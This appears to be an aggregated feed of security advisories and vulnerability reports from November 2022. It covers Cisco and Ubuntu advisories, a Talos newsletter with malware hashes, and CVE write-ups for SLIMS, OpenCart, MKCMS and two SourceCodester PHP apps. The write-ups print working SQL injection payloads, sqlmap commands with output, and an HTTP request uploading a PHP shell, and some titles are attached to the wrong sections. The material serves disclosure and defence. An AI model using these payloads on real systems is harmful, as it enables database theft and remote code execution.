A vulnerability in web-based management interface of the of Cisco Email Security Appliance and Cisco Secure Email and Web Manager could allow an authenticated, remote attacker to conduct SQL injection attacks as root on an affected system. The attacker must have the credentials of a high-privileged user account. This vulnerability is due to improper validation of user-submitted parameters. An attacker could exploit this vulnerability by authenticating to the application and sending malicious requests to an affected system. A successful exploit could allow the attacker to obtain data or modify data that is stored in the underlying database of the affected system.

*   The vulnerabilities are not dependent on one another. Exploitation of one of the vulnerabilities is not required to exploit the other vulnerability. In addition, a software release that is affected by one of the vulnerabilities may not be affected by the other vulnerability.
    
    Details about the vulnerabilities are as follows:
    
    **CVE-2022-20867: Cisco ESA and Cisco Secure Email and Web Manager Next Generation Management SQL Injection Vulnerability**
    
    A vulnerability in the next-generation UI management interface of Cisco ESA and Cisco Secure Email and Web Manager could allow an authenticated, remote attacker to conduct SQL injection attacks as _root_ on an affected system. To exploit this vulnerability, an attacker would need to have the credentials of a high-privileged user account.
    
    This vulnerability is due to improper validation of user-submitted parameters. An attacker could exploit this vulnerability by authenticating to the application and sending malicious requests to an affected system. A successful exploit could allow the attacker to obtain data or modify data that is stored in the underlying database of the affected system.
    
    Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
    
    Bug ID(s): CSCwc12185 and CSCwc12186  
    CVE ID: CVE-2022-20867  
    Security Impact Rating (SIR): High  
    CVSS Base Score: 4.7  
    CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
    
    **CVE-2022-20868: Cisco ESA, Cisco Secure Email and Web Manager, and Cisco Secure Web Appliance Next Generation Management Privilege Escalation Vulnerability**
    
    A vulnerability in the next-generation UI management interface of Cisco ESA, Cisco Secure Email and Web Manager, and Cisco Secure Web Appliance could allow an authenticated, remote attacker to elevate privileges on an affected system.
    
    This vulnerability is due to the use of a hard-coded value to encrypt a token that is used for certain API calls. An attacker could exploit this vulnerability by authenticating to an affected device and sending a crafted HTTP request. A successful exploit could allow the attacker to impersonate another valid user and execute commands with the privileges of that user account.
    
    Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
    
    Bug ID(s): CSCwc12181, CSCwc12183 and CSCwc12184  
    CVE ID: CVE-2022-20868  
    Security Impact Rating (SIR): Medium  
    CVSS Base Score: 5.4  
    CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
    

*   Cisco has released free software updates that address the vulnerabilities described in this advisory. Customers with service contracts that entitle them to regular software updates should obtain security fixes through their usual update channels.
    
    Customers may only install and expect support for software versions and feature sets for which they have purchased a license. By installing, downloading, accessing, or otherwise using such software upgrades, customers agree to follow the terms of the Cisco software license:  
    https://www.cisco.com/c/en/us/products/end-user-license-agreement.html
    
    Additionally, customers may only download software for which they have a valid license, procured from Cisco directly, or through a Cisco authorized reseller or partner. In most cases this will be a maintenance upgrade to software that was previously purchased. Free security software updates do not entitle customers to a new software license, additional software feature sets, or major revision upgrades.
    
    The Cisco Support and Downloads page on Cisco.com provides information about licensing and downloads. This page can also display customer device support coverage for customers who use the My Devices tool.
    
    When considering software upgrades, customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page, to determine exposure and a complete upgrade solution.
    
    In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers.
    
    **Customers Without Service Contracts**
    
    Customers who purchase directly from Cisco but do not hold a Cisco service contract and customers who make purchases through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should obtain upgrades by contacting the Cisco TAC: https://www.cisco.com/c/en/us/support/web/tsd-cisco-worldwide-contacts.html
    
    Customers should have the product serial number available and be prepared to provide the URL of this advisory as evidence of entitlement to a free upgrade.
    
    **Fixed Releases**
    
    In the following table(s), the left column lists Cisco software releases. The right column indicates whether a release is affected by one of the vulnerabilities that is described in this advisory and the first release that includes the fix for that vulnerability. Customers are advised to upgrade to an appropriate fixed software release as indicated in this section.
    
    **ESA: CSCwc12181 and CSCwc12185**
    
    Cisco AsyncOS Release
    
    First Fixed Release
    
    12.5.0 and earlier
    
    Not vulnerable.
    
    13.0
    
    Migrate to a fixed release.
    
    13.5
    
    Migrate to a fixed release.
    
    14.0
    
    Migrate to a fixed release.
    
    14.2
    
    14.2.1
    
    14.3
    
    14.3.01
    
    1\. This release is for cloud-based products.
    
    **Secure Email and Web Manager: CSCwc12183 and CSCwc12186**
    
    Cisco AsyncOS Release
    
    First Fixed Release
    
    11.5.1 and earlier
    
    Not vulnerable.
    
    12.0
    
    Migrate to a fixed release.
    
    12.5
    
    Migrate to a fixed release.
    
    12.8
    
    Migrate to a fixed release.
    
    13.0
    
    Migrate to a fixed release.
    
    13.6
    
    Migrate to a fixed release.
    
    13.8
    
    Migrate to a fixed release.
    
    14.0
    
    Migrate to a fixed release.
    
    14.1
    
    Migrate to a fixed release.
    
    14.2
    
    14.2.1
    
    14.3
    
    14.3.01
    
    1\. This release is for cloud-based products.
    
    **Secure Web Appliance: CSCwc12184**
    
    Cisco AsyncOS Release
    
    First Fixed Release
    
    11.7 and earlier
    
    Not vulnerable.
    
    11.8
    
    Migrate to a fixed release.
    
    12.0
    
    Migrate to a fixed release.
    
    12.5
    
    12.5.5
    
    14.0
    
    14.0.4 (Jan 2023)
    
    14.5
    
    14.5.1 (Nov 2022)
    
    Cisco Cloud Email Security (CES) includes Cisco ESA devices and Cisco Secure Email and Web Manager devices as part of the service solution. Cisco provides regular maintenance of the products included in this solution. Customers can also request a software upgrade by contacting Cisco CES support.
    
    The Cisco Product Security Incident Response Team (PSIRT) validates only the affected and fixed release information that is documented in this advisory.

CVE-2022-20867: Cisco Security Advisory: Cisco Email Security Appliance, Cisco Secure Email and Web Manager, and Cisco Secure Web Appliance Next Generation Management Vulnerabilities

Ubuntu Security Notice 5712-1 - It was discovered that SQLite did not properly handle large string inputs in certain circumstances. An attacker could possibly use this issue to cause a denial of service or arbitrary code execution.

    ==========================================================================Ubuntu Security Notice USN-5712-1November 03, 2022sqlite3 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESMSummary:SQLite could be made to crash or run programs as your login if itreceived specially crafted input.Software Description:- sqlite3: C library that implements an SQL database engineDetails:It was discovered that SQLite did not properly handle large stringinputs in certain circumstances. An attacker could possibly use thisissue to cause a denial of service or arbitrary code execution.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:   libsqlite3-0                    3.11.0-1ubuntu1.5+esm2   sqlite3                          3.11.0-1ubuntu1.5+esm2In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-5712-1   CVE-2022-35737

Ubuntu Security Notice USN-5712-1

Senayan Library Management System version 9.5.0 suffers from a remote SQL injection vulnerability.

    ## Title: Senayan Library Management System v9.5.0 a.k.a SLIMS 9 BULIAN SQLi## Author: nu11secur1ty## Date: 11.03.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0## Description:The `keywords` parameter appears to be vulnerable to SQL injection attacks.A single quote was submitted in the keywords parameter, and a generalerror message was returned.Two single quotes were then submitted and the error messagedisappeared. The injection is confirmed manually from nu11secur1ty.The attacker can retrieve all information from the database of thissystem, by using this vulnerability.## STATUS: HIGH Vulnerability[+] Payload:```MySQL---Parameter: keywords (GET)    Type: stacked queries    Title: MySQL >= 5.0.12 stacked queries (comment)    Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')));SELECTSLEEP(5)#    Type: time-based blind    Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)    Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')))RLIKE (SELECT 9971 FROM (SELECT(SLEEP(5)))bdiv)#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0)## Proof and Exploit:[href](https://streamable.com/63og5v)## Time spent`3:00`

Senayan Library Management System 9.5.0 SQL Injection

Welcome to this week’s edition of the Threat Source newsletter.
I’m fascinated by how things live and die on the internet. Things that are ubiquitous to our daily lives are simply gone the next. LiveJournal and Myspace we hardly knew you. Elon Musk’s purchase

Thursday, November 3, 2022 16:11

Welcome to this week’s edition of the Threat Source newsletter.

I’m fascinated by how things live and die on the internet. Things that are ubiquitous to our daily lives are simply gone the next. LiveJournal and Myspace we hardly knew you. Elon Musk’s purchase of Twitter and the subsequent exodus led me down the nostalgic path of thinking about how times change and platforms change but things largely remain the same. Until now. We’ve grown as an entire internet community and we remember the pain of moving from app to app and site to site. Many top infosec follows have deactivated their accounts while others are weighing when and if they will leave. Several have moved to decentralized solutions like mastodon.social which saw an uptick of more than 70,000 new users in a single day after the purchase was official. In theory Mastadon can’t be controlled by a single person or entity and to me it feels like this is the next step in our path as an internet community. Will it catch on and be the answer to all of our needs? Doubtful. It is a step in the evolution of the internet and I’m very interested to see what the next adaptation brings.

**The one big thing**

Cisco Talos Incident Response recently released their Quarterly Report highlighting the ransomware and pre-ransomware engagements, making up nearly 40 percent of threats this quarter. This quarter saw ongoing Qakbot, Hive, and Vice Society activity as well as the emergence of Black Basta, which first surfaced in April 2022. Adversaries continue to leverage not only LoLBins but a variety of publicly available tools and scripts hosted on GitHub repositories or free to download from third-party websites to support operations across multiple stages of the attack lifecycle. Defenders continue to struggle with MFA rollouts, as lack of MFA remains one of the biggest impediments to enterprise security. Nearly 18 percent of engagements either had no MFA or only had it enabled on a handful of accounts and critical services.

**Why do I care?**

Understanding the current tools and trends used by attackers, as well as understanding the vulnerabilities that are targeted are intrinsic to good security posture. Knowing your environment is step one. Understanding that same environment from the view of the attacker is the next step. Per the report “In nearly 15 percent of engagements this quarter, adversaries identified and/or exploited misconfigured public-facing applications by conducting SQL injection attacks against external websites, exploiting Log4Shell in vulnerable versions of VMware Horizon, and targeting misconfigured and/or publicly exposed servers.”

**So now what?**

Ensuring that you know your environment and are covering the base of the security pyramid well is critical. Patch, self-assess, and follow trusted threat intelligence sources. Talos IR recommends disabling VPN access for all accounts that are not using two-factor authentication and to disable or delete inactive accounts from Active Directory to prevent suspicious activity.

For the OpenSSL vulnerability we strongly recommend users mitigate affected OpenSSL systems as soon as possible by upgrading to version 3.0.7. Talos has released coverage across the device portfolio including Snort Rules: 60790, 300306-300307 to protect against exploitation of CVE-2022-3602 and ClamAV signature, Multios.Exploit.CVE\_2022\_3602-9976476-0, to detect malware artifacts related to this threat.

**Top security headlines of the week**

Security researchers were once again falsely implied by a ransomware gang in an effort to indicate their involvement. This time around Azov implicated BleepingComputer, Hasherazade, MalwareHunterTeam, Michael Gillespie, Lawrence Abrams, and Vitali Kremez, urging infected users to contact them via their accounts on Twitter to recover files.

Dropbox was the target of a recent phishing campaign that led to attackers gaining access to code stored in Github and copying 130 code repositories, including third-party libraries, internal software projects, and a few tools and configuration files maintained by the Dropbox security team. The attackers didn't gain access to any user content, passwords, or payment information. The Dropbox security team released a report detailing how they handled the incident.

**Can't get enough Talos?**

*   https://blog.talosintelligence.com/researcher-spotlight-how-azim-khodjibaev-went-from-hunting-real-world-threats-to-threats-on-the-dark-web/
*   https://blog.talosintelligence.com/quarterly-report-incident-response-trends-in-q3-2022/
*   https://blog.talosintelligence.com/openssl-vulnerability/
*   https://youtu.be/KhG6RUZgMas

**Upcoming events where you can find Talos**

BSides Lisbon (Nov. 10 - 11)  
Cidade Universitária, Lisboa, Portugal

SIS(Security Intelligence Summit), 2022.ON (Nov. 29)  
Josun Palace, Seoul

**Most prevalent malware files from Talos telemetry over the past week**

SHA 256:  
9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
Typical Filename: VID001.exe  
Detection Name: Simple\_Custom\_Detection

  
SHA256:  
d5dc790f6f220cf7e42c6c1c9f5bc6e4443cb52d07bcdef24a6bf457153c1d86  
MD5: 69fbf6849d935432bac8b04bdb00fd68  
Typical Filename: KMSAuto++.exe  
Detection Name: W32.File.MalParent

SHA256:  
e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

SHA 256:  
125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645  
MD5: 2c8ea737a232fd03ab80db672d50a17a  
Typical Filename: LwssPlayer.scr  
Claimed Product: 梦想之巅幻灯播放器  
Detection Name: Auto.125E12.241442.in02

SHA 256:  
00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725  
MD5: d47fa115154927113b05bd3c8a308201  
Typical Filename: outlook.exe  
Claimed Product: MS Outlook  
Detection Name: W32.00AB15B194-95.SBX.TG

Threat Source newsletter (Nov. 3, 2022): Mastadon, evolution, and LiveJournal oh my!

Online Tours & Travels Management System v1.0 was discovered to contain an arbitrary file upload vulnerability in the component /operations/travellers.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

Permalink

Cannot retrieve contributors at this time

**Online Tours & Travels Management System v1.0 by mayuri\_k has arbitrary code execution (RCE)**

BUG\_Author: YorkLee

vendors: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

Vulnerability url: ip/tour/admin/operations/travellers.php

Loophole location: Online Tours & Travels management system's add\_travellers.php file exists arbitrary file upload (RCE)

Request package for file upload：

POST /tour/admin/operations/travellers.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/tour/admin/add\_travellers.php
Cookie: PHPSESSID=g29omi7f91g3h7ud1uhq6rbmkv
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------9453452924520
Content-Length: 1097
\-----------------------------9453452924520
Content-Disposition: form-data; name="val-username"
hhhh
\-----------------------------9453452924520
Content-Disposition: form-data; name="val-email"
11111111@qq.com
\-----------------------------9453452924520
Content-Disposition: form-data; name="val-password"
$&@%bBHGu111
\-----------------------------9453452924520
Content-Disposition: form-data; name="val-confirm-password"
$&@%bBHGu111
\-----------------------------9453452924520
Content-Disposition: form-data; name="state\_name"
Haryana
\-----------------------------9453452924520
Content-Disposition: form-data; name="val-digits"
1888888888
\-----------------------------9453452924520
Content-Disposition: form-data; name="val-suggestions"
11111
\-----------------------------9453452924520
Content-Disposition: form-data; name="photo"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------9453452924520
Content-Disposition: form-data; name="submit"
\-----------------------------9453452924520--

The files will be uploaded to this directory \\tour\\admin\\img

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-43061: Cve_report/RCE-1.md at main · YorkLee53645349/Cve_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_appointment.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: YorkLee

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/classes/Master.php?f=delete\_appointment

Vulnerability location: /odlms/classes/Master.php?f=delete\_appointment,id

dbname=odlms\_db,length=8

\[+\] Payload: id=4' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /odlms/classes/Master.php?f\=delete\_appointment HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/odlms/admin/?page=appointments
Content-Length: 66
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
id=4'  and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-43062: Cve_report/SQLi-1.md at main · YorkLee53645349/Cve_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Users.php?f=delete_client.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: YorkLee

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/classes/Users.php?f=delete\_client

Vulnerability location: /odlms/classes/Users.php?f=delete\_client,id

dbname=odlms\_db,length=8

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /odlms/classes/Users.php?f\=delete\_client HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/odlms/admin/?page=appointments
Content-Length: 66
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
id=1'  and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-43063: Cve_report/SQLi-2.md at main · YorkLee53645349/Cve_report

OpenCart 3.0.3.7 allows users to obtain database information or read server files through SQL injection in the background.

**OpenCart allows users on admin page to obtain database information or read server files through SQL injection**

Moderate severity GitHub Reviewed Published Nov 3, 2022 • Updated Nov 4, 2022

GHSA-236j-rfx5-wq38: OpenCart allows users on admin page to obtain database information or read server files through SQL injection

MKCMS V6.2 has SQL injection via /ucenter/reg.php name parameter.

**0x00:Lead In**

> Source code can be downloaded  at  https://www.lanzous.com/ib7zwmh

This CMS is kinda funny, coz there is a universal filter addslashes  in /system/library.php

/system/library.php
<?php
...
if (!get\_magic\_quotes\_gpc()) {
    if (!empty($\_GET)) {        $\_GET \= addslashes\_deep($\_GET);    }    if (!empty($\_POST)) {        $\_POST \= addslashes\_deep($\_POST);    }    $\_COOKIE \= addslashes\_deep($\_COOKIE);    $\_REQUEST \= addslashes\_deep($\_REQUEST);
}
function addslashes\_deep($\_var\_0)
{
    if (empty($\_var\_0)) {        return $\_var\_0;    } else {        return is\_array($\_var\_0) ? array\_map('addslashes\_deep', $\_var\_0) : addslashes($\_var\_0);    }\_var\_0
}

While it uses stripslashes somewhere by mistake, let's do a global search about it, we get **3 SQL injections**  

**0x01:PreAuth SQL injection in /ucenter/repass.php**

MKCMS V6.2 has SQL injection via the /ucenter/repass.php _name_ parameter.

/ucenter/repass.php
<?php
...
if(isset($\_POST\['submit'\])){
$username \= stripslashes(trim($\_POST\['name'\]));
$email \= trim($\_POST\['email'\]);
$query \= mysql\_query("select u\_id from mkcms\_user where u\_name='$username' and u\_email='$email'");
  ...    

and it can be automated exploited by sqlmap namely

sqlmap -u http://localhost/ucenter/repass.php  --data "name=1&email\=1@1.com" -p name 
Parameter: name (POST)
    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: name=11' AND (SELECT 7672 FROM (SELECT(SLEEP(5)))NmRk) AND 'VTKx'='VTKx&email\=222@222.m&submit\=

And this can be tracked in 2019 via https://xz.aliyun.com/t/4189#toc-1  by CoolCat, so CVE request of this vuln won't belong to me, I just wanna enrich the CVE database.  

**0x02:PreAuth SQL injection in /ucenter/active.php**

MKCMS V6.2 has SQL injection via the /ucenter/active.php _verify_ parameter.

/ucenter/active.php
<?php
...
$verify \= stripslashes(trim($\_GET\['verify'\]));  
$nowtime \= time();
$query \= mysql\_query("select u\_id from mkcms\_user where u\_question='$verify'");
$row \= mysql\_fetch\_array($query);
...

Likewise, attackers can exploit it via sqlmap by typing  

sqlmap \-u http://localhost/ucenter/active.php?verify\=1 
Parameter: verify (GET)
    Type: time-based blind    Title: MySQL >\= 5.0.12 AND time-based blind (query SLEEP)    Payload: verify\=1' AND (SELECT 5656 FROM (SELECT(SLEEP(5)))xcPF) AND 'TRJq'='TRJq
    Type: UNION query    Title: Generic UNION query (NULL) \- 1 column    Payload: verify\=1' UNION ALL SELECT CONCAT(0x7171786b71,0x706d4e457048744251624653456d554a685a77654c66497a736d704c7454586462716f457a56587a,0x71707a7671)-- WUGv        

**0x03:PreAuth SQL injection in /ucenter/reg.php**

MKCMS V6.2 has SQL injection via the /ucenter/reg.php _name_ parameter.h

/ucenter/reg.php
<?php 
...
if(isset($\_POST\['submit'\])){
$username \= stripslashes(trim($\_POST\['name'\]));
$query \= mysql\_query("select u\_id from mkcms\_user where u\_name='$username'");
  ...

Again, sqlmap can be used to automate the exploitation  

sqlmap -u http://localhost/ucenter/reg.php  --data "name=1&submit\=1@1.com" -p name  
Parameter: name (POST)
    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: name=1' AND 2487=2487 AND 'WOhs'='WOhs&submit\=1@1.com
    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: name=1' AND (SELECT 6840 FROM (SELECT(SLEEP(5)))rygh) AND 'eoEE'='eoEE&submit\=1@1.com

**0x04:Mitigation**

remove the ​stripslashes() before the POST/GET param, thus we can't exploit it unless the coding of MYSQL is GBK/GB2312, i.e._wide byte sql injection._

(In my opinion,  is there any need to escape the name? it has never been allowed at all !

CVE-2020-22818: MKCMS V6.2 has mutilple vulnerabilities

Affected version：3.0.3.7 (or < 3.0.3.7 ?)

Suppose I have obtained the admin rights of the website backend

Backstage->system->maintenance->backup/restore->restore

import file，Capture，Modify file content

Payload：INSERT INTO \`opencart\`.\`oc\_api\_ip\` (\`api\_ip\_id\`, \`api\_id\`, \`ip\`) VALUES (5, 5, ‘123’ or updatexml(1,concat(0x7e,(version())),0) or’’);\\n

If there is no error information，We may use sql time injection to achieve the effect.

Through this loophole，We can get information in the database or read the file on the computer through LOAD\_FILE().

The vulnerability code is as follows

Tag

#sql